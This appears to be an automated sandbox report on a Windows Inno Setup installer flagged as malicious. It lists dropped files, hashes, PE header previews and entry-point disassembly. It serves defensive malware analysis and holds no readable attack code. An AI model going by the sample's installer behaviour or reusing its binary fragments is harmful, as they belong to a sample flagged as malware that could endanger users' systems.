                                                                            Preview:FORMAT controls the output. Interpreted sequences are:.. %% a literal %. %a locale's abbreviated weekday name (e.g., Sun). %A locale's full weekday name (e.g., Sunday). %b locale's abbreviated month name (e.g., Jan). %B locale's full month name (e.g., January). %c locale's date and time (e.g., Thu Mar 3 23:05:25 2005). %C century; like %Y, except omit last two digits (e.g., 20). %d day of month (e.g., 01). %D date; same as %m/%d/%y. %e day of month, space padded; same as %_d. %F full date; same as %Y-%m-%d. %g last two digits of year of ISO week number (see %G). %G year of ISO week number (see %V); normally useful only with %V. %h same as %b. %H hour (00..23). %I hour (01..12). %j day of year (001..366). %k hour, space padded ( 0..23); same as %_H. %l hour, space padded ( 1..12); same as %_I. %m month (01..12). %M minute (00..59). %n a newline. %N nanoseconds (000000000..999999999). %p locale's equivalent of eith
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:IFF data
                                                                            Category:dropped
                                                                            Size (bytes):1716
                                                                            Entropy (8bit):4.781797138644031
                                                                            Encrypted:false
                                                                            SSDEEP:24:wSXqInX3C5DMDxJWyjPTw2C4F0lB6v4AnFt+cUeC1/B0vFFNgpX27:wSacX3ChMDxPpulB6gAFHSJE6X27
                                                                            MD5:257D1BF38FA7859FFC3717EF36577C04
                                                                            SHA1:A9D2606CFC35E17108D7C079A355A4DB54C7C2EE
                                                                            SHA-256:DFACC2F208EBF6D6180EE6E882117C31BB58E8B6A76A26FB07AC4F40E245A0CB
                                                                            SHA-512:E13A6F489C9C5BA840502F73ACD152D366E0CCDD9D3D8E74B65FF89FDC70CD46F52E42EEE0B4BA9F151323EC07C4168CF82446334564ADAA8666624F7B8035F3
                                                                            Malicious:false
                                                                            Preview:FORMAT controls the output. Interpreted sequences are:.. %% a literal %. %a locale's abbreviated weekday name (e.g., Sun). %A locale's full weekday name (e.g., Sunday). %b locale's abbreviated month name (e.g., Jan). %B locale's full month name (e.g., January). %c locale's date and time (e.g., Thu Mar 3 23:05:25 2005). %C century; like %Y, except omit last two digits (e.g., 20). %d day of month (e.g., 01). %D date; same as %m/%d/%y. %e day of month, space padded; same as %_d. %F full date; same as %Y-%m-%d. %g last two digits of year of ISO week number (see %G). %G year of ISO week number (see %V); normally useful only with %V. %h same as %b. %H hour (00..23). %I hour (01..12). %j day of year (001..366). %k hour, space padded ( 0..23); same as %_H. %l hour, space padded ( 1..12); same as %_I. %m month (01..12). %M minute (00..59). %n a newline. %N nanoseconds (000000000..999999999). %p locale's equivalent of eith
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1825
                                                                            Entropy (8bit):5.088030483893024
                                                                            Encrypted:false
                                                                            SSDEEP:24:ZhIPjdbiNJQ387Udf9NpHjjY2S7AJYazRMiZMjYzMX2OP5usmC2ZxJnIBVjYHwZ2:vg79lS7sbtujNfuvlXJEVjH4O2
                                                                            MD5:992C00BEAB194CE392117BB419F53051
                                                                            SHA1:8F9114C95E2A2C9F9C65B9243D941DCB5CEA40DE
                                                                            SHA-256:9E35C8E29CA055CE344E4C206E7B8FF1736158D0B47BF7B3DBC362F7EC7E722C
                                                                            SHA-512:FACDCA78AE7D874300EACBE3014A9E39868C93493B9CD44AAE1AB39AFA4D2E0868E167BCA34F8C445AA7CCC9DDB27E1B607D739AF94AA4840789A3F01E7BED9D
                                                                            Malicious:false
                                                                            Preview:.# Tag replace definition..# ..# Values must be put into sections...# The following section names are supported:..#..# [*] is for all tags, i.e. values specified under this section will be replace in all tags..# Following tag-specific identifiers can be used. Values will be replaced only in specified tag...# [Conductor]..# [Date]..# [Publisher]..# [Lyrics]..# [Flags]..# [ISRC]..# [Title]..# [Catalog]..# [Year]..# [Genre]..# [Artist]..# [Album]..# [DiscId]..# [BPM]..# [Album Artist]..# [Composer]..# [Content Group]..# [Compilation]..# [Disc]..# [Track]..# [Comments]..# [Encoded by]..#..# Format is <value from>=<value to>..# where <value from> is case-sensitive value, which will be replaced..# with <value to>, which is RegEx expression...#..# If you want to do a case insensitive replacement, add ! to the name of the section ..#..# Those are specific value, which can be used as <value from>:..#..# <NULL> is used to specify empty tag as well as empty value, e.g. ..# [Comments]..# <ANY>=<
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:IFF data
                                                                            Category:dropped
                                                                            Size (bytes):1716
                                                                            Entropy (8bit):4.781797138644031
                                                                            Encrypted:false
                                                                            SSDEEP:24:wSXqInX3C5DMDxJWyjPTw2C4F0lB6v4AnFt+cUeC1/B0vFFNgpX27:wSacX3ChMDxPpulB6gAFHSJE6X27
                                                                            MD5:257D1BF38FA7859FFC3717EF36577C04
                                                                            SHA1:A9D2606CFC35E17108D7C079A355A4DB54C7C2EE
                                                                            SHA-256:DFACC2F208EBF6D6180EE6E882117C31BB58E8B6A76A26FB07AC4F40E245A0CB
                                                                            SHA-512:E13A6F489C9C5BA840502F73ACD152D366E0CCDD9D3D8E74B65FF89FDC70CD46F52E42EEE0B4BA9F151323EC07C4168CF82446334564ADAA8666624F7B8035F3
                                                                            Malicious:false
                                                                            Preview:FORMAT controls the output. Interpreted sequences are:.. %% a literal %. %a locale's abbreviated weekday name (e.g., Sun). %A locale's full weekday name (e.g., Sunday). %b locale's abbreviated month name (e.g., Jan). %B locale's full month name (e.g., January). %c locale's date and time (e.g., Thu Mar 3 23:05:25 2005). %C century; like %Y, except omit last two digits (e.g., 20). %d day of month (e.g., 01). %D date; same as %m/%d/%y. %e day of month, space padded; same as %_d. %F full date; same as %Y-%m-%d. %g last two digits of year of ISO week number (see %G). %G year of ISO week number (see %V); normally useful only with %V. %h same as %b. %H hour (00..23). %I hour (01..12). %j day of year (001..366). %k hour, space padded ( 0..23); same as %_H. %l hour, space padded ( 1..12); same as %_I. %m month (01..12). %M minute (00..59). %n a newline. %N nanoseconds (000000000..999999999). %p locale's equivalent of eith
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1825
                                                                            Entropy (8bit):5.088030483893024
                                                                            Encrypted:false
                                                                            SSDEEP:24:ZhIPjdbiNJQ387Udf9NpHjjY2S7AJYazRMiZMjYzMX2OP5usmC2ZxJnIBVjYHwZ2:vg79lS7sbtujNfuvlXJEVjH4O2
                                                                            MD5:992C00BEAB194CE392117BB419F53051
                                                                            SHA1:8F9114C95E2A2C9F9C65B9243D941DCB5CEA40DE
                                                                            SHA-256:9E35C8E29CA055CE344E4C206E7B8FF1736158D0B47BF7B3DBC362F7EC7E722C
                                                                            SHA-512:FACDCA78AE7D874300EACBE3014A9E39868C93493B9CD44AAE1AB39AFA4D2E0868E167BCA34F8C445AA7CCC9DDB27E1B607D739AF94AA4840789A3F01E7BED9D
                                                                            Malicious:false
                                                                            Preview:.# Tag replace definition..# ..# Values must be put into sections...# The following section names are supported:..#..# [*] is for all tags, i.e. values specified under this section will be replace in all tags..# Following tag-specific identifiers can be used. Values will be replaced only in specified tag...# [Conductor]..# [Date]..# [Publisher]..# [Lyrics]..# [Flags]..# [ISRC]..# [Title]..# [Catalog]..# [Year]..# [Genre]..# [Artist]..# [Album]..# [DiscId]..# [BPM]..# [Album Artist]..# [Composer]..# [Content Group]..# [Compilation]..# [Disc]..# [Track]..# [Comments]..# [Encoded by]..#..# Format is <value from>=<value to>..# where <value from> is case-sensitive value, which will be replaced..# with <value to>, which is RegEx expression...#..# If you want to do a case insensitive replacement, add ! to the name of the section ..#..# Those are specific value, which can be used as <value from>:..#..# <NULL> is used to specify empty tag as well as empty value, e.g. ..# [Comments]..# <ANY>=<
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1825
                                                                            Entropy (8bit):5.088030483893024
                                                                            Encrypted:false
                                                                            SSDEEP:24:ZhIPjdbiNJQ387Udf9NpHjjY2S7AJYazRMiZMjYzMX2OP5usmC2ZxJnIBVjYHwZ2:vg79lS7sbtujNfuvlXJEVjH4O2
                                                                            MD5:992C00BEAB194CE392117BB419F53051
                                                                            SHA1:8F9114C95E2A2C9F9C65B9243D941DCB5CEA40DE
                                                                            SHA-256:9E35C8E29CA055CE344E4C206E7B8FF1736158D0B47BF7B3DBC362F7EC7E722C
                                                                            SHA-512:FACDCA78AE7D874300EACBE3014A9E39868C93493B9CD44AAE1AB39AFA4D2E0868E167BCA34F8C445AA7CCC9DDB27E1B607D739AF94AA4840789A3F01E7BED9D
                                                                            Malicious:false
                                                                            Preview:.# Tag replace definition..# ..# Values must be put into sections...# The following section names are supported:..#..# [*] is for all tags, i.e. values specified under this section will be replace in all tags..# Following tag-specific identifiers can be used. Values will be replaced only in specified tag...# [Conductor]..# [Date]..# [Publisher]..# [Lyrics]..# [Flags]..# [ISRC]..# [Title]..# [Catalog]..# [Year]..# [Genre]..# [Artist]..# [Album]..# [DiscId]..# [BPM]..# [Album Artist]..# [Composer]..# [Content Group]..# [Compilation]..# [Disc]..# [Track]..# [Comments]..# [Encoded by]..#..# Format is <value from>=<value to>..# where <value from> is case-sensitive value, which will be replaced..# with <value to>, which is RegEx expression...#..# If you want to do a case insensitive replacement, add ! to the name of the section ..#..# Those are specific value, which can be used as <value from>:..#..# <NULL> is used to specify empty tag as well as empty value, e.g. ..# [Comments]..# <ANY>=<
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):714526
                                                                            Entropy (8bit):6.5053900039496435
                                                                            Encrypted:false
                                                                            SSDEEP:12288:fRObekMSkfohrPUs37uzHnA6zg5cItMpAHERI/rNkQRwW/6FXzb0ZDExycy:5ObekrkfohrP337uzHnA6cHiiHEVVg6i
                                                                            MD5:3910EA485B6F67ECAF6B34DDB4BE5980
                                                                            SHA1:85C397003697A6DCDBCAD43B2C7F8336BE99CA5F
                                                                            SHA-256:FD2C46551A5A55A0C2B5A12AE2385BE68681AE8E8DFA1E0C3AD686057795CC45
                                                                            SHA-512:65977C0A6E1E21D056080CCC733C303880141AF0E585275041274D6D41742FDCEDE4B3369D56A0D0C4B2A5F3AC734E48234110B8D81C43ADA5CBC10619B0DB45
                                                                            Malicious:false
                                                                            Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................d..........lp............@..............................................@...............................%..................................................................................................................CODE.....b.......d.................. ..`DATA.................h..............@...BSS..................z...................idata...%.......&...z..............@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc...............................@..P.....................H..............@..P........................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:InnoSetup Log CRTGame, version 0x30, 8020 bytes, 305090\user, "C:\Program Files (x86)\CRTGame"
                                                                            Category:dropped
                                                                            Size (bytes):8020
                                                                            Entropy (8bit):5.053397821818847
                                                                            Encrypted:false
                                                                            SSDEEP:96:p3N8WVPpbbK+T4hlOIhlXWx4cVSQs0Ln9tE2VYW4J:p98WVPp1+QIhs+cVSQ1n1mD
                                                                            MD5:362DC9BD206D9A98C71B5B075EC72964
                                                                            SHA1:CBA7C5D341B6DEAD7EA24286F2331B7FB1422228
                                                                            SHA-256:921B436995429E3E04675BBF173B2A5C793DA828F8A5484D613E1D95BC1648D3
                                                                            SHA-512:517C18CDFD3934D0B0203122FDD8AD28DDC7EEB4585E5B17F34E5F67AF90DF56CA3E069779E0E6D5A5B9853EC41275768D6F6300C32F2D2BA8C8BC76190951A8
                                                                            Malicious:false
                                                                            Preview:Inno Setup Uninstall Log (b)....................................CRTGame.........................................................................................................................CRTGame.........................................................................................................................0...G...T...%...............................................................................................................>7.?......... ........>....305090.user.C:\Program Files (x86)\CRTGame...............#.. ..........h.IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...............................o...........!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll:User32.dll.GetSystemMetr
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):714526
                                                                            Entropy (8bit):6.5053900039496435
                                                                            Encrypted:false
                                                                            SSDEEP:12288:fRObekMSkfohrPUs37uzHnA6zg5cItMpAHERI/rNkQRwW/6FXzb0ZDExycy:5ObekrkfohrP337uzHnA6cHiiHEVVg6i
                                                                            MD5:3910EA485B6F67ECAF6B34DDB4BE5980
                                                                            SHA1:85C397003697A6DCDBCAD43B2C7F8336BE99CA5F
                                                                            SHA-256:FD2C46551A5A55A0C2B5A12AE2385BE68681AE8E8DFA1E0C3AD686057795CC45
                                                                            SHA-512:65977C0A6E1E21D056080CCC733C303880141AF0E585275041274D6D41742FDCEDE4B3369D56A0D0C4B2A5F3AC734E48234110B8D81C43ADA5CBC10619B0DB45
                                                                            Malicious:false
                                                                            Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................d..........lp............@..............................................@...............................%..................................................................................................................CODE.....b.......d.................. ..`DATA.................h..............@...BSS..................z...................idata...%.......&...z..............@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc...............................@..P.....................H..............@..P........................................................................................................................................
                                                                            Process:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):2199540
                                                                            Entropy (8bit):6.34382356471681
                                                                            Encrypted:false
                                                                            SSDEEP:24576:vWtUNVKKo/Ji9iOu/6fVTC75GvMQ5HwTQKmMEV7anImzSVG61jZJ+WFchgsvKIgX:+t0Z590/6o75QHW7mMwmzialW7R5Z/h
                                                                            MD5:BB0124F16D88C4EC1FCFD9E524A5B921
                                                                            SHA1:5017DC7277DBC5BB0B6F8428E4FF72603E3A370B
                                                                            SHA-256:59495C6E79C301F767F3D336050FB9927826F0AE972D634D395F5B44D7280A09
                                                                            SHA-512:4BE3E838FB41CD4D01A12B639CDCB93DF94DEEC0DEBD2593C53BBFE977DAF5BCB9E3F97F6C47D33E76AEA12AE2F9224F27652DFB5B5A69F53D201184766FFF91
                                                                            Malicious:false
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........k.....................r.......................................6.......Rich............................PE..L.....ue.................@...................P....@...........................!......."......................................Y..P........G...........................................................................P...............................text....;.......@.................. ..`.rdata.......P... ...P..............@..@.data....P...p...0...p..............@....rsrc....G.......P..................@..@.hsave....... ......................`...................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):4
                                                                            Entropy (8bit):0.8112781244591328
                                                                            Encrypted:false
                                                                            SSDEEP:3:n:n
                                                                            MD5:9F30F3D1265389805615B2BFAC36B1B6
                                                                            SHA1:0EC565074E4C25161A5500F40DB395A6FFD70E56
                                                                            SHA-256:4F8320D91E97D546DC799848E8D218E18050AF7A7964E0414DE9E5479006D7E3
                                                                            SHA-512:89935C422FA6688112D4AC81EE7492701561D8E0C32FC76BDE9E75DC7598E3EB6F3F3F824C08A988C79CE4D4532BA7CE59C728C32096057439266175FAF8C04A
                                                                            Malicious:false
                                                                            Preview:0...
                                                                            Process:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):128
                                                                            Entropy (8bit):2.862976125752538
                                                                            Encrypted:false
                                                                            SSDEEP:3:1k/QnTzXD9iIgAnDTa3pkHil/:11TzXD9iIxPa3pkHit
                                                                            MD5:785BB7F0B0CEF59C39B9F5E21CD2FD04
                                                                            SHA1:1E1FFDEE1584A00BDE18BD7BD19C02988301C250
                                                                            SHA-256:90B35EC0C6B41ACEC2C9BB51CDDCB6339FB035C222766A4CA4CBB15B7A7D8853
                                                                            SHA-512:6D2449E111F7F059734960B83B0B090A7239EE2D93EB70F839ECDDAA640658B90667F123CFB4FE8E0F5DC0A854A47B62AA2FCAF971D08B9118CAC840DBF999EB
                                                                            Malicious:false
                                                                            Preview:3e0f25005939fee32fa196d33e7a2b8f6ce30e1128f6a30e537a9ba072d59a73................................................................
                                                                            Process:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                            File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):8
                                                                            Entropy (8bit):2.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:bcn:A
                                                                            MD5:ED1A025F9B6CF1A009D0D80A8B376BB7
                                                                            SHA1:71ED84526C3BA790366F2AF61B56A1CD5C62DAAB
                                                                            SHA-256:4E52FD6BF2DAFA7AF8E72A856D65FC4EC1A6850D79399A00B5BE7CB96C568CB3
                                                                            SHA-512:F4CB6185FFE7E6E5E4E5EC36774F71B30E7F00F1171B72B60CA5DE0CCF0C3DEE863D7F08054A30F13D31A5B8D0D3315269A4213FABC0687AD0E923313256B537
                                                                            Malicious:false
                                                                            Preview:..\g....
                                                                            Process:C:\Users\user\Desktop\6hvZpn91O8.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):704000
                                                                            Entropy (8bit):6.4972640482038075
                                                                            Encrypted:false
                                                                            SSDEEP:12288:XRObekMSkfohrPUs37uzHnA6zg5cItMpAHERI/rNkQRwW/6FXzb0ZDExyc:BObekrkfohrP337uzHnA6cHiiHEVVg6X
                                                                            MD5:F448D7F4B76E5C9C3A4EAFF16A8B9B73
                                                                            SHA1:31808F1FFA84C954376975B7CDB0007E6B762488
                                                                            SHA-256:7233B85EB0F8B3AA5CAE3811D727AA8742FEC4D1091C120A0FE15006F424CC49
                                                                            SHA-512:F8197458CD2764C0B852DAC34F9BF361110A7DC86903024A97C7BCD3F77B148342BF45E3C2B60F6AF8198AE3B83938DBAAD5E007D71A0F88006F3A0618CF36F4
                                                                            Malicious:true
                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................d..........lp............@..............................................@...............................%..................................................................................................................CODE.....b.......d.................. ..`DATA.................h..............@...BSS..................z...................idata...%.......&...z..............@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc...............................@..P.....................H..............@..P........................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):4096
                                                                            Entropy (8bit):4.026670007889822
                                                                            Encrypted:false
                                                                            SSDEEP:48:ivuz1hEU3FR/pmqBl8/QMCBaquEMx5BC+SS4k+bkguj0KHc:bz1eEFNcqBC/Qrex5iSKDkc
                                                                            MD5:0EE914C6F0BB93996C75941E1AD629C6
                                                                            SHA1:12E2CB05506EE3E82046C41510F39A258A5E5549
                                                                            SHA-256:4DC09BAC0613590F1FAC8771D18AF5BE25A1E1CB8FDBF4031AA364F3057E74A2
                                                                            SHA-512:A899519E78125C69DC40F7E371310516CF8FAA69E3B3FF747E0DDF461F34E50A9FF331AB53B4D07BB45465039E8EBA2EE4684B3EE56987977AE8C7721751F5F9
                                                                            Malicious:false
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................H................|.......|.......|......Rich............PE..L....M;J..................................... ....@..........................@..............................................l ..P....0..@............................................................................ ..D............................text............................... ..`.rdata....... ......................@..@.rsrc...@....0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):2560
                                                                            Entropy (8bit):2.8818118453929262
                                                                            Encrypted:false
                                                                            SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                                            MD5:A69559718AB506675E907FE49DEB71E9
                                                                            SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                                            SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                                            SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                                            Malicious:false
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):19456
                                                                            Entropy (8bit):5.8975201046735535
                                                                            Encrypted:false
                                                                            SSDEEP:384:ED4NeA1PrXPBdHCNPJEQkWybd0oBSRnAZ806OSDrgtOFXqYUPYNQLJ/k+9tPEBer:64NHPfHCs6GNOpiM+RFjFyzcN23A
                                                                            MD5:3ADAA386B671C2DF3BAE5B39DC093008
                                                                            SHA1:067CF95FBDB922D81DB58432C46930F86D23DDED
                                                                            SHA-256:71CD2F5BC6E13B8349A7C98697C6D2E3FCDEEA92699CEDD591875BEA869FAE38
                                                                            SHA-512:BBE4187758D1A69F75A8CCA6B3184E0C20CF8701B16531B55ED4987497934B3C9EF66ECD5E6B83C7357F69734F1C8301B9F82F0A024BB693B732A2D5760FD303
                                                                            Malicious:false
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#~..#~..#~...q.. ~..#~..!~......"~......+~......"~......"~..Rich#~..........................PE..L....[.L...........!.....6...........E.......P.......................................................................P.......P..(............................p.......................................................P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...8....`.......<..............@....reloc.......p.......J..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):6144
                                                                            Entropy (8bit):4.215994423157539
                                                                            Encrypted:false
                                                                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
                                                                            MD5:4FF75F505FDDCC6A9AE62216446205D9
                                                                            SHA1:EFE32D504CE72F32E92DCF01AA2752B04D81A342
                                                                            SHA-256:A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
                                                                            SHA-512:BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
                                                                            Malicious:false
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):23312
                                                                            Entropy (8bit):4.596242908851566
                                                                            Encrypted:false
                                                                            SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                            MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                            SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                            SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                            SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                            Malicious:false
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Entropy (8bit):7.999404759097388
                                                                            TrID:
                                                                            • Win32 Executable (generic) a (10002005/4) 98.86%
                                                                            • Inno Setup installer (109748/4) 1.08%
                                                                            • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                            File name:6hvZpn91O8.exe
                                                                            File size:7'246'011 bytes
                                                                            MD5:1015b0b5cfddfbc4baea6910d9c56c3c
                                                                            SHA1:9fe1cae9d38a53a1217556c60ffd3c02d8235d66
                                                                            SHA256:f08f680f17aaf9505a8d53648545ce684af9b39a90a8dc9d2e872693e1d59b45
                                                                            SHA512:536455cbd7a0240bb4608901c168826dadc4609132f07041bf6b4ac295b158f7cdf1be22790ee5776f80bbbc2bf4b4a13431375a7312b8f7afc05a13e22f2ecf
                                                                            SSDEEP:196608:gK2+nNevvWstwr2m5BmycyEbSfasepd5e4x6+AjZ6mjxzj:gDY6tiP3myRfzepXe4ny8gxzj
                                                                            TLSH:1C763373295C173AE240CA3166AFE1A9E16A3F3DD53B0690E2C4B1BD1BDF8E1581C725
                                                                            File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                            Icon Hash:2d2e3797b32b2b99
                                                                            Entrypoint:0x409c40
                                                                            Entrypoint Section:CODE
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0x65765E5F [Mon Dec 11 00:57:03 2023 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:1
                                                                            OS Version Minor:0
                                                                            File Version Major:1
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:1
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:884310b1928934402ea6fec1dbd3cf5e
                                                                            Instruction
                                                                            push ebp
                                                                            mov ebp, esp
                                                                            add esp, FFFFFFC4h
                                                                            push ebx
                                                                            push esi
                                                                            push edi
                                                                            xor eax, eax
                                                                            mov dword ptr [ebp-10h], eax
                                                                            mov dword ptr [ebp-24h], eax
                                                                            call 00007FD004C4F57Bh
                                                                            call 00007FD004C50782h
                                                                            call 00007FD004C50A11h
                                                                            call 00007FD004C52A48h
                                                                            call 00007FD004C52A8Fh
                                                                            call 00007FD004C553BEh
                                                                            call 00007FD004C55525h
                                                                            xor eax, eax
                                                                            push ebp
                                                                            push 0040A2FCh
                                                                            push dword ptr fs:[eax]
                                                                            mov dword ptr fs:[eax], esp
                                                                            xor edx, edx
                                                                            push ebp
                                                                            push 0040A2C5h
                                                                            push dword ptr fs:[edx]
                                                                            mov dword ptr fs:[edx], esp
                                                                            mov eax, dword ptr [0040C014h]
                                                                            call 00007FD004C55F8Bh
                                                                            call 00007FD004C55BBEh
                                                                            lea edx, dword ptr [ebp-10h]
                                                                            xor eax, eax
                                                                            call 00007FD004C53078h
                                                                            mov edx, dword ptr [ebp-10h]
                                                                            mov eax, 0040CDE8h
                                                                            call 00007FD004C4F627h
                                                                            push 00000002h
                                                                            push 00000000h
                                                                            push 00000001h
                                                                            mov ecx, dword ptr [0040CDE8h]
                                                                            mov dl, 01h
                                                                            mov eax, 0040738Ch
                                                                            call 00007FD004C53907h
                                                                            mov dword ptr [0040CDECh], eax
                                                                            xor edx, edx
                                                                            push ebp
                                                                            push 0040A27Dh
                                                                            push dword ptr fs:[edx]
                                                                            mov dword ptr fs:[edx], esp
                                                                            call 00007FD004C55FFBh
                                                                            mov dword ptr [0040CDF4h], eax
                                                                            mov eax, dword ptr [0040CDF4h]
                                                                            cmp dword ptr [eax+0Ch], 01h
                                                                            jne 00007FD004C5613Ah
